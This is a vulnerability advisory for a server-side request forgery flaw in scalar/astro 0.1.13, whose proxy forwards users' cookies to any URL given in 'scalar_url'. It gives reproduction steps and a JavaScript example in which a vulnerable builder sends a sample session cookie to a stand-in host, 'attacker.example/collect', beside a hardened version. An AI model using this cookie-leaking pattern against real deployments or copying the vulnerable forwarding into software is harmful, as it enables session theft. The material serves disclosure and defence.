scalar/astro
- 0.1.13
A server-side request forgery (SSRF) vulnerability has been identified in scalar/astro version 0.1.13. The Scalar Proxy endpoint takes the target of its server-side fetch from the 'scalar_url' query parameter without restricting it, so an unauthenticated attacker can make the server issue HTTP requests to a URL they control. Because the proxy also forwards the headers of the incoming request, including 'Cookie', to that target, the flaw can expose authentication cookies and headers and potentially enable privilege escalation.
Exploitation of this vulnerability in self-hosted deployments can result in unauthorized access to user accounts by stealing session tokens. In contrast, the impact on Scalar's hosted instance is less severe, as the leaked cookies do not contain authentication tokens.
To reproduce this vulnerability, send a request to the Scalar Proxy endpoint with the 'scalar_url' parameter set to an attacker-controlled URL and include a 'Cookie' header carrying the deployment's authentication cookies (in practice, the cookies a logged-in user's browser attaches when it requests the proxy URL). The proxy performs the server-side fetch to the specified URL and forwards the cookies and other headers of the original request along with it, so the attacker-controlled server receives them.
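The forwarding behaviour described above, modelled as a standalone JavaScript example added here (this is not Scalar's code; the function names, the origin allowlist and the sample request are assumptions): the vulnerable form accepts any 'scalar_url' and copies every incoming header onto the outbound fetch, while the hardened form allowlists the target origin, restricts the scheme and strips credential-bearing headers before the server-side request is built.

```javascript
// Added example, not Scalar's code. Models the header forwarding behind the
// scalar_url SSRF and a hardened replacement. Function names, the allowlist and
// the sample request below are assumptions for illustration only.

// Headers that identify the *requester* to the proxy and must never be relayed
// to a target chosen by a query parameter.
const CREDENTIAL_HEADERS = new Set(['cookie', 'authorization', 'proxy-authorization']);

// Vulnerable pattern: trust scalar_url as given and copy every incoming header
// onto the outbound fetch. An attacker-controlled scalar_url therefore receives
// the requester's Cookie header.
function buildProxyRequestVulnerable(requestUrl, incomingHeaders) {
  const target = new URL(requestUrl).searchParams.get('scalar_url');
  const headers = {};
  for (const [name, value] of Object.entries(incomingHeaders)) {
    headers[name.toLowerCase()] = value;
  }
  return { target, headers };
}

// Hardened pattern: the target must be an absolute http(s) URL without embedded
// credentials whose origin is on a deployment-specific allowlist, and the
// requester's credential headers are dropped before forwarding.
function buildProxyRequestHardened(requestUrl, incomingHeaders, allowedOrigins) {
  const raw = new URL(requestUrl).searchParams.get('scalar_url');
  if (!raw) throw new Error('scalar_url is required');
  let target;
  try {
    target = new URL(raw);
  } catch {
    throw new Error('scalar_url must be an absolute URL');
  }
  if (target.protocol !== 'https:' && target.protocol !== 'http:') {
    throw new Error(`unsupported scheme ${target.protocol}`);
  }
  if (target.username || target.password) {
    throw new Error('credentials in scalar_url are not allowed');
  }
  if (!allowedOrigins.has(target.origin)) {
    throw new Error(`origin ${target.origin} is not allowlisted`);
  }
  const headers = {};
  for (const [name, value] of Object.entries(incomingHeaders)) {
    const lower = name.toLowerCase();
    if (CREDENTIAL_HEADERS.has(lower)) continue; // never relay requester credentials
    headers[lower] = value;
  }
  return { target: target.href, headers };
}

// Constructed sample: a logged-in browser requests a self-hosted proxy endpoint
// with an attacker-supplied scalar_url. All hosts and values are placeholders.
const SAMPLE_REQUEST =
  'https://docs.example.com/scalar/proxy?scalar_url=' +
  encodeURIComponent('https://attacker.example/collect');
const SAMPLE_HEADERS = {
  Cookie: 'session=0123456789abcdef',
  Accept: 'application/json',
};
const ALLOWED_ORIGINS = new Set(['https://api.example.com']);

function demo() {
  const leaked = buildProxyRequestVulnerable(SAMPLE_REQUEST, SAMPLE_HEADERS);
  console.log('vulnerable: fetch', leaked.target, 'with cookie', leaked.headers.cookie);
  try {
    buildProxyRequestHardened(SAMPLE_REQUEST, SAMPLE_HEADERS, ALLOWED_ORIGINS);
  } catch (err) {
    console.log('hardened: rejected:', err.message);
  }
  const allowed = buildProxyRequestHardened(
    'https://docs.example.com/scalar/proxy?scalar_url=' +
      encodeURIComponent('https://api.example.com/users'),
    SAMPLE_HEADERS,
    ALLOWED_ORIGINS,
  );
  console.log('hardened: fetch', allowed.target, 'headers', Object.keys(allowed.headers));
}

demo();
```

The allowlist is the key control: a proxy that relays arbitrary targets on behalf of a browser is an SSRF primitive by design, and stripping 'Cookie' alone still leaves the server reachable as a request origin for internal addresses. Both checks belong together.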